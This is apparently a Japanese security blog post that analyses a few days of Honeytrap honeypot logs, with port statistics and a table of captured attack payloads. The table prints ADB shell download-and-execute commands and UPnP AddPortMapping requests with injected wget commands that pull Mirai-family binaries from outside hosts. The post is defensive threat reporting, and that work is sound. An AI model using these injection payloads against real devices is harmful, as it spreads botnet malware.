【ハニーポット】Honeytrap簡易分析(65-72日目:10/17-10/19)
まとめての分析結果となりますが、Honeytrapの65-72日目の簡易分析です。
◾️Honeytrap 簡易分析
特段、大きく傾向の変わった通信はありませんでした。
<攻撃元検知分布>
<検知数>
<検知宛先ポート>
443ポート宛ての通信が多いですが、何かの脆弱性を狙ったものではなく、調査行為止まりの通信だと思います。
◾️ペイロード
SMBrS@bPC NETWORK PROGRAM 10LANMAN10Windows for Workgroups 31aLM12X002LANMAN21NT LM 012
| 宛先ポート | 検知数 |
| 445 | 9184 |
| 22 | 302 |
| 8022 | 251 |
| 2222 | 247 |
| 222 | 241 |
| 3389 | 208 |
| 1433 | 199 |
| 81 | 160 |
| 8080 | 155 |
| 443 | 151 |
<マルウェアダウンロード先>
特に検知傾向は変化せず、Mirai系のマルウェアが多く見られました。
| 宛先ポート | ダウンロード先 | ペイロード | 検知数 |
| 5555 | hxxp://185[.]162[.]130[.]187/adbs2 | CNXN............2.......host::.OPEN............aJ......shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2. | 5 |
| 5555 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 4 |
| 5555 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... | 33 |
| 5555 | hxxp://207[.]148[.]78[.]152/bc | CNXN............2.......host::.OPEN............&A......shell:cd /data/local/tmp;wget hxxp://xxx.xxx.xxx.xxx/br -O- >br;sh br;busybox wget hxxp://xxx.xxx.xxx.xxx/r -O- >r;sh r;curl hxxp://xxx.xxx.xxx.xxx/c >c;sh c;busybox curl hxxp://xxx.xxx.xxx.xxx/bc >bc;sh bc;rm -rf bc br r c;. | 1 |
| 5555 | hxxp://27[.]102[.]115[.]44/adbs2 | CNXN............2.......host::.OPEN)...........O/......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2. | 1 |
| 52869 | hxxp://107[.]191[.]99[.]230/loli[.]mips | POST /picsdesc.xmlhxxp/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 633..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/loli.mips -O loli`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> | 45 |
| 52869 | hxxp://76[.]74[.]177[.]230/hakai[.]mips | POST /picsdesc.xmlhxxp/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 634..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-693.el7.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/hakai.mips -O hakai`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> | 31 |
| 52869 | hxxp://76[.]74[.]177[.]230/seraph[.]mips | POST /picsdesc.xmlhxxp/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 636..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/seraph.mips -O seraph`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> | 21 |
